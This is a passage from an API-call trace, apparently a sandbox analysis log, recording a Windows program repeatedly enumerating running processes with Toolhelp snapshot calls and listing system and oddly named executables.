th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0127.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0127.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0127.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0127.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0127.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0127.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0127.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0127.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0127.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0127.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0127.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0127.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0127.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0127.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0127.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0127.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0127.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0127.421] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.422] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0127.423] CloseHandle (hObject=0xc4) returned 1 [0127.423] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0127.428] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0127.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0127.430] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0127.431] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0127.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0127.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0127.434] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0127.434] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.437] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0127.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0127.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.443] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0127.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0127.500] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0127.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.502] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.503] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0127.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0127.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0127.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0127.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0127.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0127.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0127.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0127.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0127.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0127.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0127.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0127.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0127.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0127.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0127.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0127.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0127.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0127.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0127.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0127.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0127.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0127.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0127.532] CloseHandle (hObject=0xbc) returned 1 [0127.532] Sleep (dwMilliseconds=0x12c) [0127.892] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0127.899] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0127.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0127.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0127.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0127.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0127.906] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0127.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0127.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 